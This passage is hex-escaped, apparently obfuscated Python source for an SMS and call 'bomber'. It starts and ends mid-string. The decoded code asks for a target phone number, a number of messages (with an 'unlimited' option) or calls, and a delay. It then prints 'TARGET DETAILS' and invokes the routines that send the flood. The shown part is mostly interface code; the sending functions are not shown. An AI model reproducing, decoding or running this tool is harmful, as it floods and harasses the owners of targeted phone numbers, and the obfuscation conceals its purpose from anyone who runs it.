\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d
\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x7b\x35\x7d\x28\x7b\x33\x7d\x30\x20\x46\x6f\x72\x20\x55\x6e\x6c\x69\x6d\x69\x74\x65\x64\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c
\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x32\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x32\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x32\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45
\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x35\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x35\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x35\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20
\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d
\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e
\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x43\x61\x6c\x6c\x20\x54\x6f\x20\x4d\x61\x6b\x65\x7b\x35\x7d\x28\x7b\x33\x7d\x4d\x61\x78\x69\x6d\x75\x6d\x20\x32\x30\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65
\x6e\x64\x65\x64\x20\x31\x30\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x31\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x31\x30\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x31\x30\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74
\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x